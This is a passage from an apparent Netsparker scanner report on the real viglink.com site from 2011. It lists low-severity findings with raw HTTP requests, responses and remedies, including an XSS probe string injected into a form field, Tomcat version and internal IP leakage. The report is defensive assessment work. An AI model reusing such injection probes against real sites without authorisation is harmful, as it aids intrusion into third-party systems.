Due to the content-type of the response, exploitation of this vulnerability might not be possible in all browsers, or might not be possible at all. The content-type indicates that exploitation may be possible by changing the attack; however, Netsparker does not support confirming these issues, so you need to confirm this problem manually. Generally, a lack of filtering in the response can cause Cross-site Scripting vulnerabilities in browsers that perform automatic MIME sniffing, such as Internet Explorer.

Request

POST /users/action/presales HTTP/1.1
Referer: http://www.viglink.com/corp/publishers
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Host: www.viglink.com
Cookie: JSESSIONID=0D758EBC84516656A5552FB78210DFA3; vglnk.Agent.p=2a85645e86606155fb48bdd87df159eb
Content-Length: 97
Accept-Encoding: gzip, deflate

email=netsparker%40example.com&domain='%22%3e%3cnet+sparker%3dnetsparker(0x0004B9)%3e&format=json

Response

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate
Content-Type: application/json
Date: Mon, 18 Apr 2011 23:52:33 GMT
Expires: -1
Pragma: no-cache
Set-Cookie: JSESSIONID=5DBF621D79B65D8D43E54ED603CF7320; Path=/
Content-Length: 87
Connection: keep-alive


{"message":"Invalid website ''\"><net sparker=netsparker(0x0004B9)>'","result":false}
Auto Complete Enabled

1 TOTAL
LOW
CONFIRMED
1
"Auto Complete" was enabled in one or more of the form fields. These were either "password" fields or important fields such as "Credit Card".

Impact

Data entered in these fields will be cached by the browser. An attacker who can access the victim's browser could steal this information. This is especially important if the application is commonly used in shared computers such as cyber cafes or airport terminals.

Remedy

Add the attribute autocomplete="off" to the form tag or to individual "input" fields.

Actions to Take

  1. See the remedy for the solution.
  2. Find all instances of inputs which store private data and disable autocomplete. Fields that contain data such as "Credit Card" or "CCV" values should not be cached. You can allow the application to cache usernames and remember passwords; however, in most cases this is not recommended.
  3. Re-scan the application after addressing the identified issues to ensure that all of the fixes have been applied properly.

Required Skills for Successful Exploitation

Dumping all data from a browser can be fairly easy and there exist a number of automated tools to undertake this. Where the attacker cannot dump the data, he/she could still browse the recently visited websites and activate the auto-complete feature to see previously entered values.

- /users/login

/users/login CONFIRMED

https://www.viglink.com/users/login?_ek=tl&ar=%2Fusers%2F

Identified Field Name

password

Request

GET /users/login?_ek=tl&ar=%2Fusers%2F HTTP/1.1
Referer: https://www.viglink.com/users/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.viglink.com
Cookie: vglnk.Agent.p=ed34bf95ecb748028d32495101e192fd
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.0 200 OK
Date: Mon, 18 Apr 2011 23:50:51 GMT
Expires: -1
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Set-Cookie: JSESSIONID=380A9EABD02B302776B39533862B67EE; Path=/; Secure
Content-Type: text/html;charset=UTF-8
Content-Language: en
Vary: Accept-Encoding
Content-Encoding:
Content-Length: 2016
Connection: close


<!doctype html><html lang="en" xmlns:og="http://ogp.me/ns#" xmlns:fb="http://www.facebook.com/2008/fbml"><head> <title>VigLink - Sign In</title> <meta http-equiv="Content-type" content="text/html; charset=utf-8"/> <meta name="keywords" content="affiliate marketing, monetization, content, optimization"/> <meta name="description" content="Your links can be doing more. Unlock the power of your site&#39;s links and earn extra money from your site automatically, transparently and honestly."/> <meta property="og:title" content="VigLink"/> <meta property="og:type" content="company"/> <meta property="og:url" content="http://www.viglink.com/"/> <meta property="og:image" content="http://www.viglink.com/public/images/logo-icon-small.png"/> <meta property="og:latitude" content="37.7801339"/> <meta property="og:longitude" content="-122.396744"/> <meta property="og:street-address" content="539 Bryant St Suite 400"/> <meta property="og:locality" content="San Francisco"/> <meta property="og:region" content="CA"/> <meta property="og:postal-code" content="94107"/> <meta property="og:country-name" content="USA"/> <meta property="og:email" content="info@viglink.com"/> <meta property="og:phone_number" content="+1 (415) 963-9826"/> <meta property="og:fax_number" content="+1 (415) 520-6695"/> <meta property="og:site_name" content="VigLink"/> <meta property="fb:admins" content="6003321,705684"/> <link rel="icon" type="image/png" href="/public/images/favicon.png"/> <link rel="alternate" type="application/rss+xml" title="VigLink Blog &raquo; Feed" href="http://blog.viglink.com/feed/" /> <script type="text/javascript"> var ENV = { account: { }, cookie: { domain: '.viglink.com', suffix: 'p' ? 
'.p' : '' } }; </script> <link rel="stylesheet" type="text/css" href="/combined.css.h-1806938078.pack" charset="utf-8"/><script type="text/javascript" src="/combined.js.h898114336.pack" charset="utf-8"></script><!--[if IE 7]><link rel="stylesheet" href="/public/css/ie7.css" type="text/css" /><![endif]--></head><body> <div id="header"> <div class="content"> <h1><a href="/">VigLink</a></h1> <ul class="navigation"> <li><a href="/jobs" class="jobs">We're Hiring!</a></li><li><a href="/corp/publishers">Publishers</a></li><li><a href="/corp/merchants">Merchants</a></li><li><a href="/support/faq">FAQ</a></li><li><a href="http://blog.viglink.com/">Blog</a></li></ul></div></div><div id="body"> <div id="flash" class="error"> <p>Please log in first.</p><div class="left corner"></div> <div class="right corner"></div> </div><div class="column span-8"> <h2>Log In</h2> <form action="https://www.viglink.com/users/action/login" method="post"> <input type="hidden" name="authRedirect" value="/users/"/> <label for="email">Email:</label> <input id="email" name="email" size="30" type="text" value="" placeholder="you@example.com"/> <label for="password">Password:</label> <input id="password" name="password" size="30" type="password"/> <button type="submit">Log In</button> <ul class="actions"> <li><a href="/users/send-verification">I forgot my password</a></li> <li>Need an account? 
<a href="/users/signup">Sign up</a></li> </ul> </form></div></div> <div id="footer"> <ul class="navigation"> <li><a href="/jobs" class="jobs">We're Hiring!</a></li><li><a href="/corp/publishers">Publishers</a></li><li><a href="/corp/merchants">Merchants</a></li><li><a href="/support/faq">FAQ</a></li><li><a href="http://blog.viglink.com/">Blog</a></li></ul><ul class="social navigation"> <li class="twitter"><a href="http://www.twitter.com/viglink"><strong>Follow us</strong> on Twitter</a></li> <li class="facebook"><a href="http://www.facebook.com/viglink"><strong>Become a fan</strong> on Facebook</a></li> </ul> <ul class="minor navigation"> <li><a href="/about">About</a></li> <li><a href="/jobs">Jobs</a></li> <li><a href="/about/press">Press</a></li> <li><a href="/policies/tos">Terms of Service</a></li> <li><a href="/policies/privacy">Privacy Policy</a></li> <li><a href="/policies/ftc">FTC Disclosure</a></li> <li><a href="/support">Contact Us</a></li> </ul> <span> &copy; VigLink 2011</span></div><script type="text/javascript"> var is_ssl = ("https:" == document.location.protocol); var asset_host = is_ssl ? "https://s3.amazonaws.com/getsatisfaction.com/" : "http://s3.amazonaws.com/getsatisfaction.com/"; document.write(unescape("%3Cscript src='" + asset_host + "javascripts/feedback-v2.js' type='text/javascript'%3E%3C/script%3E")); </script> <script type="text/javascript"> (function() { try { new GSFN.feedback_widget({ display: "overlay", company: "viglink", placement: "right", color: ";", style: "question" }); } catch(err) {} })(); </script> <script type="text/javascript"> var gaJsHost = (("https:" == document.location.protocol) ? "https://ssl." 
: "http://www."); document.write(unescape("%3Cscript src='" + gaJsHost + "google-analytics.com/ga.js' type='text/javascript'%3E%3C/script%3E")); </script> <script type="text/javascript"> try { var pageTracker = _gat._getTracker("UA-8560005-1"); pageTracker._trackPageview(); } catch(err) {} </script> <!-- Served by: www.viglink.com (10.245.213.194) --></body></html>
Cookie Not Marked As HttpOnly

1 TOTAL
LOW
CONFIRMED
1
Cookie was not marked as HTTPOnly. HTTPOnly cookies cannot be read by client-side scripts; therefore, marking a cookie as HTTPOnly can provide an additional layer of protection against Cross-site Scripting attacks.

Impact

During a Cross-site Scripting attack an attacker might easily access cookies and hijack the victim's session.

Actions to Take

  1. See the remedy for the solution.
  2. Consider marking all of the cookies used by the application as HTTPOnly (after this change, JavaScript code will not be able to read them).

Remedy

Mark the cookie as HTTPOnly. This will be an extra layer of defence against XSS. However this is not a silver bullet and will not protect the system against Cross-site Scripting attacks. An attacker can use a tool such as XSS Tunnel to bypass HTTPOnly protection.

- /users/

/users/ CONFIRMED

https://www.viglink.com/users/

Identified Cookie

vglnk.Agent.p

Request

GET /users/ HTTP/1.1
Referer: https://www.viglink.com/users/action/login
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.viglink.com
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.0 302 Moved Temporarily
Date: Mon, 18 Apr 2011 23:50:51 GMT
Expires: -1
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Set-Cookie: vglnk.Agent.p=ed34bf95ecb748028d32495101e192fd; Domain=.viglink.com; Expires=Thu, 15-Apr-2021 23:50:51 GMT; Path=/
Location: https://www.viglink.com/users/login?_ek=tl&ar=%2Fusers%2F
Content-Length: 0
Connection: close
Content-Type: text/plain


Tomcat Version Disclosure

1 TOTAL
LOW
Netsparker identified that the target web server is Tomcat. This information was gathered from the HTTP Headers.

Impact

An attacker can look for specific security vulnerabilities for the version disclosed by the SERVER header.

Remedy

Configure your web server to prevent information leakage from the SERVER header of its HTTP response.
- /users/action/login

/users/action/login

https://www.viglink.com/users/action/login

Extracted Version

Apache Tomcat/6.0.20

Request

GET /users/action/login HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.viglink.com
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.0 403 Forbidden
Date: Mon, 18 Apr 2011 23:50:51 GMT
Expires: -1
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Set-Cookie: vglnk.Agent.p=70d5567f87d0029654b87f692c749fac; Domain=.viglink.com; Expires=Thu, 15-Apr-2021 23:50:51 GMT; Path=/
Content-Type: text/html;charset=utf-8
Vary: Accept-Encoding
Content-Encoding:
Content-Length: 388
Connection: close


<html><head><title>Apache Tomcat/6.0.20 - Error report</title><style><!--H1 {font-family:Tahoma,Arial,sans-serif;color:white;background-color:#525D76;font-size:22px;} H2 {font-family:Tahoma,Arial,sans-serif;color:white;background-color:#525D76;font-size:16px;} H3 {font-family:Tahoma,Arial,sans-serif;color:white;background-color:#525D76;font-size:14px;} BODY {font-family:Tahoma,Arial,sans-serif;color:black;background-color:white;} B {font-family:Tahoma,Arial,sans-serif;color:white;background-color:#525D76;} P {font-family:Tahoma,Arial,sans-serif;background:white;color:black;font-size:12px;}A {color : black;}A.name {color : black;}HR {color : #525D76;}--></style> </head><body><h1>HTTP Status 403 - </h1><HR size="1" noshade="noshade"><p><b>type</b> Status report</p><p><b>message</b> <u></u></p><p><b>description</b> <u>Access to the specified resource () has been forbidden.</u></p><HR size="1" noshade="noshade"><h3>Apache Tomcat/6.0.20</h3></body></html>
[Possible] Internal IP Address Leakage

1 TOTAL
LOW
Netsparker discovered an internal IP address in the page. It was not determined if the IP address was that of the system itself or that of an internal network.

Impact

This kind of information can be useful for an attacker when combined with other vulnerabilities.

Remedy

First ensure that this is not a false positive. Due to the nature of the issue, Netsparker could not confirm that this IP address was actually the real internal IP address of the target web server or internal network. If it is, consider removing it.
- /

/

https://www.viglink.com/

Extracted IP Address(es)

10.242.201.220

Request

GET / HTTP/1.1
Referer: https://www.viglink.com/users/action/login
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.viglink.com
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.0 200 OK
Date: Mon, 18 Apr 2011 23:50:51 GMT
Expires: -1
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Set-Cookie: vglnk.Agent.p=bfddb90717c6db6b0a7878196952ce96; Domain=.viglink.com; Expires=Thu, 15-Apr-2021 23:50:51 GMT; Path=/,JSESSIONID=A06F0DDC982BCE0244F28C001F36E03D; Path=/; Secure
Content-Type: text/html;charset=UTF-8
Content-Language: en
Vary: Accept-Encoding
Content-Encoding:
Content-Length: 4912
Connection: close


<!doctype html><html lang="en" xmlns:og="http://ogp.me/ns#" xmlns:fb="http://www.facebook.com/2008/fbml"><head> <title>Affiliate Every Link on the Web with VigLink</title> <meta http-equiv="Content-type" content="text/html; charset=utf-8"/> <meta name="keywords" content="affiliate marketing, monetization, content, optimization"/> <meta name="description" content="Your links can be doing more. Unlock the power of your site&#39;s links and earn extra money from your site automatically, transparently and honestly."/> <meta property="og:title" content="VigLink"/> <meta property="og:type" content="company"/> <meta property="og:url" content="http://www.viglink.com/"/> <meta property="og:image" content="http://www.viglink.com/public/images/logo-icon-small.png"/> <meta property="og:latitude" content="37.7801339"/> <meta property="og:longitude" content="-122.396744"/> <meta property="og:street-address" content="539 Bryant St Suite 400"/> <meta property="og:locality" content="San Francisco"/> <meta property="og:region" content="CA"/> <meta property="og:postal-code" content="94107"/> <meta property="og:country-name" content="USA"/> <meta property="og:email" content="info@viglink.com"/> <meta property="og:phone_number" content="+1 (415) 963-9826"/> <meta property="og:fax_number" content="+1 (415) 520-6695"/> <meta property="og:site_name" content="VigLink"/> <meta property="fb:admins" content="6003321,705684"/> <link rel="icon" type="image/png" href="/public/images/favicon.png"/> <link rel="alternate" type="application/rss+xml" title="VigLink Blog &raquo; Feed" href="http://blog.viglink.com/feed/" /> <script type="text/javascript"> var ENV = { account: { }, cookie: { domain: '.viglink.com', suffix: 'p' ? 
'.p' : '' } }; </script> <link rel="stylesheet" type="text/css" href="/combined.css.h-1806938078.pack" charset="utf-8"/><link rel="stylesheet" type="text/css" href="/combined.css.h-1203998437.pack" charset="utf-8"/><script type="text/javascript" src="/combined.js.h898114336.pack" charset="utf-8"></script><script type="text/javascript" src="/combined.js.h-337151240.pack" charset="utf-8"></script><!--[if IE 7]><link rel="stylesheet" href="/public/css/ie7.css" type="text/css" /><![endif]--></head><body> <div id="header"> <div class="content"> <h1><a href="/">VigLink</a></h1> <ul class="navigation"> <li><a href="/jobs" class="jobs">We're Hiring!</a></li><li><a href="/corp/publishers">Publishers</a></li><li><a href="/corp/merchants">Merchants</a></li><li><a href="/support/faq">FAQ</a></li><li><a href="http://blog.viglink.com/">Blog</a></li></ul><span class="delimiter"></span> <ul class="navigation"> <li><a href="/users/signup">Sign Up</a></li><li><a href="/users/login">Log In</a></li></ul> </div></div><div id="body"> <h2 class="tagline"> The easiest way to monetize your content <a href="/users/signup" class="default button">Get Started Today</a></h2><ol id="viglink_steps"> <li class="write"><div>Create links in your blog or webpages as normal.</div></li> <li class="track"><div>When visitors click a link, we follow along.</div></li> <li class="earn"><div>If a purchase is made, you earn a commission.</div></li></ol><div> <div class="column span-33p"> <a href="http://www.youtube-nocookie.com/watch?v=SIYBfHUY6cg&amp;hl=en_US&amp;fs=1&amp;rel=0" class="fancybox swf"> <img src="/public/images/screenshots/video-thumb.jpg" width="268" height="173" alt=""/> </a> <h4>How It Works</h4> <p> If one of your users clicks through to a product or service and buys something, you earn a commission. You only pay us a share of what you earn. 
</p> </div> <div class="column span-33p"> <a href="/public/images/screenshots/dashboard-revenue.jpg" class="image fancybox" title="" rel="dashboard"> <img src="/public/images/screenshots/dashboard-thumb.jpg" width="268" height="173" alt=""/> <span class="zoom">Zoom</span> </a> <a href="/public/images/screenshots/dashboard-merchants.jpg" class="fancybox" title="" rel="dashboard" style="display: none;"></a> <a href="/public/images/screenshots/dashboard-links.jpg" class="fancybox" title="" rel="dashboard" style="display: none;"></a> <a href="/public/images/screenshots/dashboard-clicks.jpg" class="fancybox" title="" rel="dashboard" style="display: none;"></a> <h4>Powerful Analytics</h4> <p> Track where users are going when they leave your site, understand which links and pages are driving the most revenue and to which merchants, and much more. </p> </div> <div class="column span-33p"> <a href="/partners" id="partners" class="image"> <img src="/public/images/partners_lg/amazon.png" alt="Amazon logo" width="182" height="35"/> <img src="/public/images/partners_lg/itunes.png" alt="iTunes logo" width="138" height="35"/> <img src="/public/images/partners_lg/walmart.png" alt="Walmart logo" width="167" height="41"/> <img src="/public/images/partners_lg/target.png" alt="Target logo" width="47" height="59"/> <img src="/public/images/partners_lg/newegg.png" alt="Newegg logo" width="81" height="39"/> <span class="zoom">More Partners</span> </a> <h4>Over 12,500 Merchants</h4> <p> Enjoy coverage of thousands of merchants across more than 20 affiliate networks. Automatically participate in all of them with one simple signup. </p> </div></div><div> <div class="column span-33p"> <h4>Easy to Install</h4> <p> Install VigLink by pasting a few lines of HTML into your site. VigLink also works with common platforms like WordPress, Blogger, TypePad and more. 
</p> </div> <div class="column span-33p"> <h4>Reliable on Any Size Site</h4> <p> VigLink works for any site, whether it gets 5 visits or 5 billion. Our system is designed to be totally failsafe. Even if our servers blew up, your links will keep working perfectly. </p> </div> <div class="column span-33p"> <h4>Already an Affiliate?</h4> <p> VigLink only affiliates links you've missed, or links in programs you're not already using. Links you've already affiliated are left alone. VigLink won't cost you a thing. </p> </div> <div class="column span-100p" id="signup"> <a href="/users/signup" class="default button">Get Started Today</a> </div> <div class="column span-100p" id="quotes"> <ul class="quotes"> <li> <blockquote> VigLink has been a true partner in every aspect of the word. They continue to push the envelope to improve the consumer experience, while delivering high quality traffic to our site. I would recommend VigLink for any blog/forum that puts the consumer first. </blockquote> <p> <a href="http://motors.ebay.com"> <img src="/public/images/quotes/logo-ebaymotors.png" width="164" height"38" alt="Ebay Motors logo"/> <span class="who">Famous Rhodes</span> <span class="title">Director of eBay Motors</span> </a> </p></li><li> <blockquote> VigLink's technology is easy to install and instantly provides detailed reporting of revenue that you weren't making before. Beyond that, the technical team has been highly competent and responsive to needed changes - there's not a lot more we could ask for. We'll look forward to more products from this team in the future. </blockquote> <p> <a href="http://www.huddler.com"> <img src="/public/images/quotes/logo-huddler.png" width="162" height"49" alt="Huddler logo"/> <span class="who">Dan Gill</span> <span class="title">CEO Huddler.com</span> </a> </p></li><li> <blockquote> From the first day we started with VigLink, we have never looked back, or elsewhere, for real time commission link management. 
</blockquote> <p> <a href="http://www.avsforum.com"> <img src="/public/images/quotes/logo-avsforum.png" width="182" height"33" alt="AVS Forums logo"/> <span class="who">David Bott</span> <span class="title">AVSForum.com, Inc.</span> </a> </p></li><li> <blockquote> VigLink has been a great and responsive partner during our nearly 2 year partnership. Their innovative products and service have provided an additional channel of monetization without interfering with our core user experience. The additional value they bring to the table is a willingness to collaborate and assist us in developing new monetization opportunities. </blockquote> <p> <a href="http://www.internetbrands.com/"> <img src="/public/images/quotes/logo-internetbrands.png" width="109" height"49" alt="Internet Brands logo"/> <span class="who">Alvin Fong</span> <span class="title">Director, Internet Brands</span> </a> </p></li><li> <blockquote> VigLink has now become an essential part of our business strategy and a major revenue stream. A truly innovative way to monetize any web site quickly without the addition of traditional intrusive display ads. </blockquote> <p> <a href="http://www.forumfoundry.com/"> <img src="/public/images/quotes/logo-forumfoundry.png" width="80" height"55" alt="Forum Foundry logo"/> <span class="who">Dan Kiehl</span> <span class="title">Forumfoundry.com</span> </a> </p></li><li> <blockquote> VigLink is a fast, automated way for Bloggers to partner with Google Affiliate Network. It takes minimal effort for Bloggers to monetize their content through Google Affiliate Network links and we've already seen VigLink installs result in new productive, affiliate publishers. </blockquote> <p> <a href="http://www.connectcommerce.com/"> <span class="who">Mari Condon</span> <span class="title">Publisher Account Manager,</span> <span class="title">Google Affiliate Network</span> </a> </p></li><li> <blockquote> I was skeptical at first how much VigLink could do for me. 
After almost a year of putting it off I decided to give it a try. Now I'm very sorry I lost a year of significant revenue. Installation takes a minute, nice Control Panel, no noticeable difference for your users, and best of all great money paid on time! </blockquote> <p> <a href="http://www.ferrarichat.com/"> <img src="/public/images/quotes/logo-ferrarichat.png" width="147" height"38" alt="Ferrari Chat logo"/> <span class="who">Rob Lay</span> <span class="title">Owner, Ferrarichat.com</span> </a> </p></li><li> <blockquote> VigLink is a long-standing strategic partner with eBay, eBay Motors, and eBay Marketing. We consider VigLink to be one of the most relevant and efficient sub-affiliate partners we have in our program today. Their work to build unique incremental tools with eBay APIs and to standardize implementations across many different kinds of platforms sets them apart as an innovative industry leader in the internet marketing space. </blockquote> <p> <a href="http://www.schaafco.com/"> <img src="/public/images/quotes/logo-schaaf.png" width="107" height"47" alt="Schaaf Partnercentric logo"/> <span class="title">Schaaf-PartnerCentric/eBay</span> </a> </p></li><li> <blockquote> I was skeptical about the VigLink program when it was presented. I checked with two more technical advisers who said it looked OK. I signed up, put in the code in my Forum software and was shocked to see the income the first month. I've been receiving three and sometimes four figures of income each month. It's a great deal. </blockquote> <p> <a href="http://www.askandyaboutclothes.com/"> <span class="who">Andy Gilchrist</span> <span class="title">Owner, AskAndyAboutClothes.com</span> </a> </p></li><li> <blockquote> I have been with VigLink one week and so far, I love it! I don't have time to affiliate all my links when I don't know which blog posts will generate traffic and which ones don't. VigLink gives me the option to focus on good content, and traffic building, not link building. 
</blockquote> <p> <a href="http://www.morewithlesstoday.com/"> <span class="who">Lori Felix</span> <span class="title">Blogger, More With Less Today</span> </a> </p></li></ul> </div></div></div> <div id="footer"> <ul class="navigation"> <li><a href="/jobs" class="jobs">We're Hiring!</a></li><li><a href="/corp/publishers">Publishers</a></li><li><a href="/corp/merchants">Merchants</a></li><li><a href="/support/faq">FAQ</a></li><li><a href="http://blog.viglink.com/">Blog</a></li></ul><ul class="social navigation"> <li class="twitter"><a href="http://www.twitter.com/viglink"><strong>Follow us</strong> on Twitter</a></li> <li class="facebook"><a href="http://www.facebook.com/viglink"><strong>Become a fan</strong> on Facebook</a></li> </ul> <ul class="minor navigation"> <li><a href="/about">About</a></li> <li><a href="/jobs">Jobs</a></li> <li><a href="/about/press">Press</a></li> <li><a href="/policies/tos">Terms of Service</a></li> <li><a href="/policies/privacy">Privacy Policy</a></li> <li><a href="/policies/ftc">FTC Disclosure</a></li> <li><a href="/support">Contact Us</a></li> </ul> <span> &copy; VigLink 2011</span></div><script type="text/javascript"> var is_ssl = ("https:" == document.location.protocol); var asset_host = is_ssl ? "https://s3.amazonaws.com/getsatisfaction.com/" : "http://s3.amazonaws.com/getsatisfaction.com/"; document.write(unescape("%3Cscript src='" + asset_host + "javascripts/feedback-v2.js' type='text/javascript'%3E%3C/script%3E")); </script> <script type="text/javascript"> (function() { try { new GSFN.feedback_widget({ display: "overlay", company: "viglink", placement: "right", color: ";", style: "question" }); } catch(err) {} })(); </script> <script type="text/javascript"> var gaJsHost = (("https:" == document.location.protocol) ? "https://ssl." 
: "http://www."); document.write(unescape("%3Cscript src='" + gaJsHost + "google-analytics.com/ga.js' type='text/javascript'%3E%3C/script%3E")); </script> <script type="text/javascript"> try { var pageTracker = _gat._getTracker("UA-8560005-1"); pageTracker._trackPageview(); } catch(err) {} </script> <!-- Served by: www.viglink.com (10.242.201.220) --></body></html>
Forbidden Resource

Forbidden Resource

1 TOTAL
INFORMATION
CONFIRMED
1
Access to this resource has been denied by the web server. This is generally not a security issue, and is reported here for information purposes.

Impact

There is no impact resulting from this issue.
- /users/action/login

/users/action/login CONFIRMED

https://www.viglink.com/users/action/login

Request

GET /users/action/login HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.viglink.com
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.0 403 Forbidden
Date: Mon, 18 Apr 2011 23:50:51 GMT
Expires: -1
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Set-Cookie: vglnk.Agent.p=70d5567f87d0029654b87f692c749fac; Domain=.viglink.com; Expires=Thu, 15-Apr-2021 23:50:51 GMT; Path=/
Content-Type: text/html;charset=utf-8
Vary: Accept-Encoding
Content-Encoding:
Content-Length: 388
Connection: close


<html><head><title>Apache Tomcat/6.0.20 - Error report</title><style><!--H1 {font-family:Tahoma,Arial,sans-serif;color:white;background-color:#525D76;font-size:22px;} H2 {font-family:Tahoma,Arial,sans-serif;color:white;background-color:#525D76;font-size:16px;} H3 {font-family:Tahoma,Arial,sans-serif;color:white;background-color:#525D76;font-size:14px;} BODY {font-family:Tahoma,Arial,sans-serif;color:black;background-color:white;} B {font-family:Tahoma,Arial,sans-serif;color:white;background-color:#525D76;} P {font-family:Tahoma,Arial,sans-serif;background:white;color:black;font-size:12px;}A {color : black;}A.name {color : black;}HR {color : #525D76;}--></style> </head><body><h1>HTTP Status 403 - </h1><HR size="1" noshade="noshade"><p><b>type</b> Status report</p><p><b>message</b> <u></u></p><p><b>description</b> <u>Access to the specified resource () has been forbidden.</u></p><HR size="1" noshade="noshade"><h3>Apache Tomcat/6.0.20</h3></body></html>
E-mail Address Disclosure

E-mail Address Disclosure

1 TOTAL
INFORMATION
Netsparker found e-mail addresses on the web site.

Impact

E-mail addresses discovered within the application can be used by both spam email engines and also brute force tools. Furthermore, valid email addresses may lead to social engineering attacks.

Remedy

Use generic email addresses such as contact@ or info@ for general communications, and remove user/people-specific e-mail addresses from the web site. Should contacting specific people be required, use submission forms for this purpose.

External References

- /

/

https://www.viglink.com/

Found E-mails

info@viglink.com

Request

GET / HTTP/1.1
Referer: https://www.viglink.com/users/action/login
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.viglink.com
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.0 200 OK
Date: Mon, 18 Apr 2011 23:50:51 GMT
Expires: -1
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Set-Cookie: vglnk.Agent.p=bfddb90717c6db6b0a7878196952ce96; Domain=.viglink.com; Expires=Thu, 15-Apr-2021 23:50:51 GMT; Path=/,JSESSIONID=A06F0DDC982BCE0244F28C001F36E03D; Path=/; Secure
Content-Type: text/html;charset=UTF-8
Content-Language: en
Vary: Accept-Encoding
Content-Encoding:
Content-Length: 4912
Connection: close


<!doctype html><html lang="en" xmlns:og="http://ogp.me/ns#" xmlns:fb="http://www.facebook.com/2008/fbml"><head> <title>Affiliate Every Link on the Web with VigLink</title> <meta http-equiv="Content-type" content="text/html; charset=utf-8"/> <meta name="keywords" content="affiliate marketing, monetization, content, optimization"/> <meta name="description" content="Your links can be doing more. Unlock the power of your site&#39;s links and earn extra money from your site automatically, transparently and honestly."/> <meta property="og:title" content="VigLink"/> <meta property="og:type" content="company"/> <meta property="og:url" content="http://www.viglink.com/"/> <meta property="og:image" content="http://www.viglink.com/public/images/logo-icon-small.png"/> <meta property="og:latitude" content="37.7801339"/> <meta property="og:longitude" content="-122.396744"/> <meta property="og:street-address" content="539 Bryant St Suite 400"/> <meta property="og:locality" content="San Francisco"/> <meta property="og:region" content="CA"/> <meta property="og:postal-code" content="94107"/> <meta property="og:country-name" content="USA"/> <meta property="og:email" content="info@viglink.com"/> <meta property="og:phone_number" content="+1 (415) 963-9826"/> <meta property="og:fax_number" content="+1 (415) 520-6695"/> <meta property="og:site_name" content="VigLink"/> <meta property="fb:admins" content="6003321,705684"/> <link rel="icon" type="image/png" href="/public/images/favicon.png"/> <link rel="alternate" type="application/rss+xml" title="VigLink Blog &raquo; Feed" href="http://blog.viglink.com/feed/" /> <script type="text/javascript"> var ENV = { account: { }, cookie: { domain: '.viglink.com', suffix: 'p' ? 
'.p' : '' } }; </script> <link rel="stylesheet" type="text/css" href="/combined.css.h-1806938078.pack" charset="utf-8"/><link rel="stylesheet" type="text/css" href="/combined.css.h-1203998437.pack" charset="utf-8"/><script type="text/javascript" src="/combined.js.h898114336.pack" charset="utf-8"></script><script type="text/javascript" src="/combined.js.h-337151240.pack" charset="utf-8"></script><!--[if IE 7]><link rel="stylesheet" href="/public/css/ie7.css" type="text/css" /><![endif]--></head><body> <div id="header"> <div class="content"> <h1><a href="/">VigLink</a></h1> <ul class="navigation"> <li><a href="/jobs" class="jobs">We're Hiring!</a></li><li><a href="/corp/publishers">Publishers</a></li><li><a href="/corp/merchants">Merchants</a></li><li><a href="/support/faq">FAQ</a></li><li><a href="http://blog.viglink.com/">Blog</a></li></ul><span class="delimiter"></span> <ul class="navigation"> <li><a href="/users/signup">Sign Up</a></li><li><a href="/users/login">Log In</a></li></ul> </div></div><div id="body"> <h2 class="tagline"> The easiest way to monetize your content <a href="/users/signup" class="default button">Get Started Today</a></h2><ol id="viglink_steps"> <li class="write"><div>Create links in your blog or webpages as normal.</div></li> <li class="track"><div>When visitors click a link, we follow along.</div></li> <li class="earn"><div>If a purchase is made, you earn a commission.</div></li></ol><div> <div class="column span-33p"> <a href="http://www.youtube-nocookie.com/watch?v=SIYBfHUY6cg&amp;hl=en_US&amp;fs=1&amp;rel=0" class="fancybox swf"> <img src="/public/images/screenshots/video-thumb.jpg" width="268" height="173" alt=""/> </a> <h4>How It Works</h4> <p> If one of your users clicks through to a product or service and buys something, you earn a commission. You only pay us a share of what you earn. 
</p> </div> <div class="column span-33p"> <a href="/public/images/screenshots/dashboard-revenue.jpg" class="image fancybox" title="" rel="dashboard"> <img src="/public/images/screenshots/dashboard-thumb.jpg" width="268" height="173" alt=""/> <span class="zoom">Zoom</span> </a> <a href="/public/images/screenshots/dashboard-merchants.jpg" class="fancybox" title="" rel="dashboard" style="display: none;"></a> <a href="/public/images/screenshots/dashboard-links.jpg" class="fancybox" title="" rel="dashboard" style="display: none;"></a> <a href="/public/images/screenshots/dashboard-clicks.jpg" class="fancybox" title="" rel="dashboard" style="display: none;"></a> <h4>Powerful Analytics</h4> <p> Track where users are going when they leave your site, understand which links and pages are driving the most revenue and to which merchants, and much more. </p> </div> <div class="column span-33p"> <a href="/partners" id="partners" class="image"> <img src="/public/images/partners_lg/amazon.png" alt="Amazon logo" width="182" height="35"/> <img src="/public/images/partners_lg/itunes.png" alt="iTunes logo" width="138" height="35"/> <img 